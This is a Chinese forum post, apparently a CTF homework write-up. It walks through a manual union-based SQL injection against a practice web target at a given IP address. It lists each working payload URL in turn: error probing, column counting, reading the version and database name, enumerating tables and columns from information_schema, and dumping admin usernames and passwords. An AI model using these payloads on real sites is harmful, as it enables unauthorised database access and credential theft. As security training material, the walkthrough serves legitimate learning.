化白作业提交 公开课第一章

silence丶   ·   发表于 2018-12-07 15:21:50   ·   CTF&WP专版

目标地址为:http://117.41.229.122:8003/?id=1

1. 单引号,http://117.41.229.122:8003/?id=1'  数据库报错;

2. and 1=1,http://117.41.229.122:8003/?id=1 and 1=1,SQL语句为 select * from *** where id =1 and 1=1,页面显示正常;

3. and 1=2,http://117.41.229.122:8003/?id=1 and 1=2,SQL语句为 select * from *** where id =1 and 1=2,因为1=2恒假,数据库报错,证明存在sql注入

4. order by, http://117.41.229.122:8003/?id=1 order by 10,SQL语句为 select * from *** where id =1 order by 10,因为数据库没有10个字段,报错,使用二分法测试,确定字段为2

5. union select,http://117.41.229.122:8003/?id=1 union select 1,2 页面显示正常,需使用报错注入

6. and 1=2 union select, http://117.41.229.122:8003/?id=1 and 1=2 union select 1,2  页面显示为第二个字段

7.@@version、database(),http://117.41.229.122:8003/?id=1 and 1=2 union select 1,@@version 判断数据库为mysql和当前数据库maoshe

8.确定表名:http://117.41.229.122:8003/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database(),结果当前表为admin

9.确定列名:http://117.41.229.122:8003/?id=1 and 1=2 union select 1,group_concat(column_name,'-') from information_schema.columns where table_name='admin' ,列名为id、username、password

10.获取表,http://117.41.229.122:8003/?id=1 and 1=2 union select 1,group_concat(username,'-',password) from admin limit 0,1,拿到flag


打赏我,让我更有动力~

0 Reply   |  Until 2018-12-7 | 1542 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.